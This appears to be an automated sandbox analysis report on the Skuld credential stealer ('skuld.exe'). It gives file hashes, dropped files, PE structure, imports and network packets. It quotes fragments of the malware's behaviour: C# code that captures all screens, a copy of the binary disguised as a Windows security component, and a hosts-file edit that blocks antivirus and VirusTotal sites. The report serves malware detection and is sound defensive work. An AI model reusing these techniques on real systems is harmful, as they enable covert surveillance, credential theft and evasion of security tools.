                                                                                                                                          C:\Users\user\AppData\Local\Temp\dh1o0wbe\CSC88D051478A0408BB4BF8545E397BDC4.TMP

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                          File Type:MSVC .res
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):652
                                                                                                                                          Entropy (8bit):3.0938230641660156
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryQak7YnqqmPN5Dlq5J:+RI+ycuZhNOakSmPNnqX
                                                                                                                                          MD5:1A00B217164926120A0AD7CB85DB54B0
                                                                                                                                          SHA1:447526D60471F96AD462587F307C214C8B01846D
                                                                                                                                          SHA-256:5887239F9DED413BBFF92F3AF5D50B2F599CA7FD8FDD50BC03D81D9CD83BD0A8
                                                                                                                                          SHA-512:EF55B12B161867967DFC48F2BEB31B40AF76191C1B0B1B8394A0C5ABE1CAA911692CAB3DD5D5B919AB7DEF61C2B2A14EBFBEAE6BD341179CF62C3A8F3AECBC3C
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.h.1.o.0.w.b.e...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...d.h.1.o.0.w.b.e...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                          C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.0.cs

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1004
                                                                                                                                          Entropy (8bit):4.154581034278981
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                          MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                          SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                          SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                          SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.cmdline

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):607
                                                                                                                                          Entropy (8bit):5.319536918209162
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ik+SfZHGWZEaSfZHb:V3ka6KOkqeFk+e9XEae9b
                                                                                                                                          MD5:44CCA0AD55BFC17B701A9961B3671B45
                                                                                                                                          SHA1:7AE1438050D4708F64B34480B42551E282C552ED
                                                                                                                                          SHA-256:42EB69FBE696CA27543FBA9A022A8760105ADCA7B289BDDB2C6B3C653ECDE8B8
                                                                                                                                          SHA-512:35FD9103794D70022734328C88AB17F82271952637AFCC893544EC2AB4B2FE80049BEF59A7D4F9B20BA9036604BC886C205C2CB43775BEE39C7A30F7CBDDAD77
                                                                                                                                          Malicious:true
                                                                                                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.0.cs"

                                                                                                                                          C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.dll

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):4096
                                                                                                                                          Entropy (8bit):3.159670599209851
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:6g7oEAtf0KhzBU/sLf6mtJlN0w4pW1ulOa3aq:0Nz0hmtOw+AK
                                                                                                                                          MD5:E648BD17F0FAF30CD15BC165695F7011
                                                                                                                                          SHA1:78CC146CD626885229BCC7A9C9D18BAD02B4625E
                                                                                                                                          SHA-256:2E1896DA41C60374D35D830A1893B6B0B30FA4ACE9D2E22ACD320F462F66E80C
                                                                                                                                          SHA-512:80A594FFA6CA9534FCA63D8E290657B711053620286755549E4E25C16BB860D5AB73164E4DB1DF2B3B38FBBDA64AF5591821A9FA730019579F1CC87DDE6EAF30
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'g.g...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.out

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):1129
                                                                                                                                          Entropy (8bit):5.40450528637215
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:KLeaId3ka6KOkqeFk+e9XEae9aKax5DqBVKVrdFAMBJTH:Rakka6NkqeFkV9XER9aK2DcVKdBJj
                                                                                                                                          MD5:BCFE4783A3C59AF73E0C2AC999B550BD
                                                                                                                                          SHA1:26F4CEA94B87A7FB36DB78A7597F6B090CA32E2D
                                                                                                                                          SHA-256:5C15D25D64423612FD08AA1C5C16F20499657C962C87D7DA3D5A90F0DBE7734F
                                                                                                                                          SHA-512:49C29D932A0CD50804B541557DBC5AE16BF9729F8AD134803F800EA87BB0D4312DD790E2E6657F602A512D93DAC8F58370C7272FAEF2DB36CEFC341185A74D3F
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.C:\Users\user\AppData\Local\Temp\vw7TwX1TN1> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version

                                                                                                                                          C:\Users\user\AppData\Local\Temp\vw7TwX1TN1\Display (1).png

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):65008
                                                                                                                                          Entropy (8bit):7.605705552234734
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:JaNZMBFhfo/UBYibDgUjIkNod+oCBD/S9qX7AQ:JaNZOFhfYiYUjIkuuSqX7AQ
                                                                                                                                          MD5:271E61D9BF64F2DF4975FC187ED323EE
                                                                                                                                          SHA1:0292DB81171128BE63D259BFBB1C3F58583DC3FB
                                                                                                                                          SHA-256:C18E715E3B3B128463C654A157ED5E648E34FEBA3153CF5071E0709BF80E3A5E
                                                                                                                                          SHA-512:5A0C5358033705213B2C02FA4D147D0B9AB76C982665974EC3C80325FDBD4B34933A1755726898B2CFBAB8CFF97039DAEA1A5C843FF1B77C81BB8DE2A4D5528C
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^........q}...#FM.X....}m..X...{[.%.-.^P.....A...,H....."...a.e..]v..3...3s.{..........3../..............@.2........d.c.......@v0........d.c.......@v0........d.c.......@v0........d.c.......@v0..Z.;n..}:m...............b..y.Qr..... .0...4h..7j....Q.hr....THW\\,...UN]....K............G.UW.|.a.?.......?O..w.-..w.....#.<"O>..t..SF..#.:v.&W^e..v/*.3.wUA]{..!:.<..S.........`.b.9.n]y...A..^.{..O...7..Ra`.^.e.|...\u...{d.G.DF..AF.hf.V>.y...y.... c.. ...C...Q..Wn...o.....n...S&..K.d...P..-...w.~..m.w&Iw...*.T...... ...).[....Ge...o?c...-..z..w.>26?_.t.&W_s......w..R...q.?e..H.w.J..x.......9...?<!%s.........X.+...O..... .._..,;..*;...;.6.]K.].[J...d.w&...P!.......Y.XL..G.-.>....>\...g..>.x.@...zJ...+.>. ....M.....T..ku_....p.....l..?.f.0Y.d..].l..Y6..B6~........S!...l..R^.......+..";.....o..oI...7.;.TW..........,c,&...G....u8g..bI4..R....L.0Iz..%.53......>"k

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\Desktop\skuld.exe
                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):10810368
                                                                                                                                          Entropy (8bit):6.302238189558208
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:98304:eVAAxtu/EQrLafuvVfVOsdQnJpyMR/w9A0rn7vEPb:eTxw/E0fVOsiJpyMR/wGysPb
                                                                                                                                          MD5:1B19480E05B72ABB96AAFDF9625B5646
                                                                                                                                          SHA1:38A12185FCEDF55ECB219E684206A733FFF2CD7B
                                                                                                                                          SHA-256:40A684FF28F001AD2B3AAA501D2EADE9AAF94FE6951EEA52239F39835E6C7E37
                                                                                                                                          SHA-512:98B45AA93A0754F396E97AD44DD18D4E2A639F87731E1477445734C228FAF0254CB9A0CE57CA1F34F9F0A7619E9C565F5B62D93D45A1CD1204B2952B51EBBF9D
                                                                                                                                          Malicious:true
                                                                                                                                          Yara Hits:
                                                                                                                                          • Rule: JoeSecurity_GoStealer, Description: Yara detected Go Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, Author: Joe Security
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................"......TO.........`|........@...........................................`... .................................................>..............X................%.................................................. y..x............................text...qSO......TO................. ..`.rdata....I..pO...I..ZO.............@..@.data....T...p.......N..............@....pdata..X..........................@..@.xdata.............................@..@.idata..>..........................@....reloc...%.......&.................@..B.symtab..............................B................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Windows\System32\drivers\etc\hosts

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\Desktop\skuld.exe
                                                                                                                                          File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):2165
                                                                                                                                          Entropy (8bit):4.522303506272206
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:vDZhyoZWM9rU5fFcqwUYi1iBopn2g2+oGSVy2w23c4Zezwd0/a7S4qqBLE97aFsL:vDZEurK9UUlcBsn2g2+lSw2w23c4ZezT
                                                                                                                                          MD5:BD87D7EA7B5DBD74CC0B0E38477F6079
                                                                                                                                          SHA1:63C28862A5D0052F2425A8B45AC0F66572A02F33
                                                                                                                                          SHA-256:EB97F9588DFFD94BC3B06EAED77751593F32F9E0D09A9B7868746AB16E7F45F1
                                                                                                                                          SHA-512:1DD93CD24870D9716980B38145A1DC23F8EFB5DB93DB9D5223C1D0984CD8E064C6C99B6833F7066392BA79D887AC37F0BA3D8D5CD657B56967D51A2836C52AF0
                                                                                                                                          Malicious:true
                                                                                                                                          Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost..0.0.0.0 virustotal.com.0.0.0.0 www.virustotal.com.0.0.0.0 avast.com.0.0.0.0 www.avast.com.0.0.0.0 totalav.com.0.0.0.0 www.totalav.com.0.0.0.0 scanguard.com.0.0.0.0 www.scanguar

                                                                                                                                          \Device\Null

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with very long lines (381), with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):392
                                                                                                                                          Entropy (8bit):5.237198052265355
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:0k4+DgBWg/sK2vAPKZC92/4jJpBVd+min79eEno:0k4+tgsZS2kX+TxXo
                                                                                                                                          MD5:7F599F4277A8C4152074D773FD3AB801
                                                                                                                                          SHA1:D19F04FD5E944642D6C5D684EBAB2F42C1177197
                                                                                                                                          SHA-256:A3639AF5E23464FC391DAE127FD5493F02C8178068A35866D9C7FDD35DCD623F
                                                                                                                                          SHA-512:CCE2C7C5240EA0D59C9C01C3AB3E3D7B4E0B026D5385B330D5B60D45B01D4D9CF5662B22F445154EE7368DF09D0D6C863D7019D20CDDFBC6E7C533774B46707B
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:#< CLIXML..<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><Obj S="progress" RefId="0"><TN RefId="0"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj></Objs>

                                                                                                                                          Static File Info

                                                                                                                                          General

                                                                                                                                          File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                          Entropy (8bit):6.302238189558208
                                                                                                                                          TrID:
                                                                                                                                          • Win64 Executable Console (202006/5) 92.65%
                                                                                                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                          • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                          File name:skuld.exe
                                                                                                                                          File size:10'810'368 bytes
                                                                                                                                          MD5:1b19480e05b72abb96aafdf9625b5646
                                                                                                                                          SHA1:38a12185fcedf55ecb219e684206a733fff2cd7b
                                                                                                                                          SHA256:40a684ff28f001ad2b3aaa501d2eade9aaf94fe6951eea52239f39835e6c7e37
                                                                                                                                          SHA512:98b45aa93a0754f396e97ad44dd18d4e2a639f87731e1477445734c228faf0254cb9a0ce57ca1f34f9f0a7619e9c565f5b62d93d45a1cd1204b2952b51ebbf9d
                                                                                                                                          SSDEEP:98304:eVAAxtu/EQrLafuvVfVOsdQnJpyMR/w9A0rn7vEPb:eTxw/E0fVOsiJpyMR/wGysPb
                                                                                                                                          TLSH:FBB65A47E8A145E5C0AD9275C6268267BF713C885F3063D36B60F7282F77BD0AAB9740
                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."......TO.........`|........@...........................................`... ............................

                                                                                                                                          File Icon

                                                                                                                                          Icon Hash:90cececece8e8eb0

                                                                                                                                          Static PE Info

                                                                                                                                          General

                                                                                                                                          Entrypoint:0x477c60
                                                                                                                                          Entrypoint Section:.text
                                                                                                                                          Digitally signed:false
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          Subsystem:windows cui
                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                          Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                          TLS Callbacks:
                                                                                                                                          CLR (.Net) Version:
                                                                                                                                          OS Version Major:6
                                                                                                                                          OS Version Minor:1
                                                                                                                                          File Version Major:6
                                                                                                                                          File Version Minor:1
                                                                                                                                          Subsystem Version Major:6
                                                                                                                                          Subsystem Version Minor:1
                                                                                                                                          Import Hash:d42595b695fc008ef2c56aabd8efd68e

                                                                                                                                          Entrypoint Preview

                                                                                                                                          Instruction
                                                                                                                                          jmp 00007F9724C4D000h
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          push ebp
                                                                                                                                          dec eax
                                                                                                                                          mov ebp, esp
                                                                                                                                          pushfd
                                                                                                                                          cld
                                                                                                                                          dec eax
                                                                                                                                          sub esp, 000000E0h
                                                                                                                                          dec eax
                                                                                                                                          mov dword ptr [esp], edi
                                                                                                                                          dec eax
                                                                                                                                          mov dword ptr [esp+08h], esi
                                                                                                                                          dec eax
                                                                                                                                          mov dword ptr [esp+10h], ebp
                                                                                                                                          dec eax
                                                                                                                                          mov dword ptr [esp+18h], ebx
                                                                                                                                          dec esp
                                                                                                                                          mov dword ptr [esp+20h], esp
                                                                                                                                          dec esp
                                                                                                                                          mov dword ptr [esp+28h], ebp
                                                                                                                                          dec esp
                                                                                                                                          mov dword ptr [esp+30h], esi
                                                                                                                                          dec esp
                                                                                                                                          mov dword ptr [esp+38h], edi
                                                                                                                                          movups dqword ptr [esp+40h], xmm6
                                                                                                                                          movups dqword ptr [esp+50h], xmm7
                                                                                                                                          inc esp
                                                                                                                                          movups dqword ptr [esp+60h], xmm0
                                                                                                                                          inc esp
                                                                                                                                          movups dqword ptr [esp+70h], xmm1
                                                                                                                                          inc esp
                                                                                                                                          movups dqword ptr [esp+00000080h], xmm2
                                                                                                                                          inc esp
                                                                                                                                          movups dqword ptr [esp+00000090h], xmm3
                                                                                                                                          inc esp
                                                                                                                                          movups dqword ptr [esp+000000A0h], xmm4
                                                                                                                                          inc esp
                                                                                                                                          movups dqword ptr [esp+000000B0h], xmm5
                                                                                                                                          inc esp
                                                                                                                                          movups dqword ptr [esp+000000C0h], xmm6
                                                                                                                                          inc esp
                                                                                                                                          movups dqword ptr [esp+000000D0h], xmm7
                                                                                                                                          inc ebp
                                                                                                                                          xorps xmm7, xmm7
                                                                                                                                          dec ebp
                                                                                                                                          xor esi, esi
                                                                                                                                          dec eax
                                                                                                                                          mov eax, dword ptr [009F2E02h]
                                                                                                                                          dec eax
                                                                                                                                          mov eax, dword ptr [eax]
                                                                                                                                          dec eax
                                                                                                                                          cmp eax, 00000000h
                                                                                                                                          je 00007F9724C50965h
                                                                                                                                          dec esp
                                                                                                                                          mov esi, dword ptr [eax]
                                                                                                                                          dec eax
                                                                                                                                          sub esp, 10h
                                                                                                                                          dec eax
                                                                                                                                          mov eax, ecx
                                                                                                                                          dec eax
                                                                                                                                          mov ebx, edx
                                                                                                                                          call 00007F9724C5AE9Bh

                                                                                                                                          Data Directories

                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xa9b0000x53e.idata
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0xa7d0000x1c758.pdata
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xa9c0000x125e4.reloc
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x9979200x178.data
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                          Sections

                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                          .text0x10000x4f53710x4f5400e13aadca07fd714c7b6ee444ba1eceafunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                          .rdata0x4f70000x49f2c80x49f40030164080b19d6a015b4b95a0983a04d1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                          .data0x9970000xe54d00x8ae00dc378de327ab90c6ea049381a1cab2e0False0.44049737004950495data5.474001955888405IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          .pdata0xa7d0000x1c7580x1c80060fc52114c3960b32acfb403a84d79cbFalse0.40284916392543857data5.578985131266137IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                          .xdata0xa9a0000xb40x200e081e1b68888a642916dfe290e66cc84False0.2265625shared library1.783206012798912IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                          .idata0xa9b0000x53e0x60047964ba415ecbe03922c7ab31e9305bdFalse0.3763020833333333OpenPGP Public Key4.014135709345301IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          .reloc0xa9c0000x125e40x1260038071608851efceb90573fb3cee85738False0.20777529761904762data5.437444673783102IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                          .symtab0xaaf0000x40x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                          Imports

                                                                                                                                          DLLImport
                                                                                                                                          kernel32.dllWriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, RtlVirtualUnwind, RtlLookupFunctionEntry, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler, AddVectoredContinueHandler

                                                                                                                                          Network Behavior

                                                                                                                                          Network Port Distribution

                                                                                                                                          TCP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Mar 12, 2025 10:40:45.096761942 CET49704443192.168.2.18104.26.13.205
                                                                                                                                          Mar 12, 2025 10:40:45.096807003 CET44349704104.26.13.205192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:45.096949100 CET49704443192.168.2.18104.26.13.205
                                                                                                                                          Mar 12, 2025 10:40:45.097508907 CET49704443192.168.2.18104.26.13.205
                                                                                                                                          Mar 12, 2025 10:40:45.097521067 CET44349704104.26.13.205192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:46.675412893 CET44349704104.26.13.205192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:46.675640106 CET49704443192.168.2.18104.26.13.205
                                                                                                                                          Mar 12, 2025 10:40:46.675649881 CET44349704104.26.13.205192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:46.675744057 CET49704443192.168.2.18104.26.13.205
                                                                                                                                          Mar 12, 2025 10:40:46.675749063 CET44349704104.26.13.205192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:46.677251101 CET44349704104.26.13.205192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:46.677319050 CET49704443192.168.2.18104.26.13.205
                                                                                                                                          Mar 12, 2025 10:40:46.751630068 CET49704443192.168.2.18104.26.13.205
                                                                                                                                          Mar 12, 2025 10:40:46.751796961 CET44349704104.26.13.205192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:46.751863956 CET49704443192.168.2.18104.26.13.205
                                                                                                                                          Mar 12, 2025 10:40:46.751869917 CET44349704104.26.13.205192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:46.801635981 CET49704443192.168.2.18104.26.13.205
                                                                                                                                          Mar 12, 2025 10:40:47.226687908 CET44349704104.26.13.205192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:47.226757050 CET44349704104.26.13.205192.168.2.18
                                                                                                                                          Mar 12, 2025 10:40:47.226819992 CET49704443192.168.2.18104.26.13.205
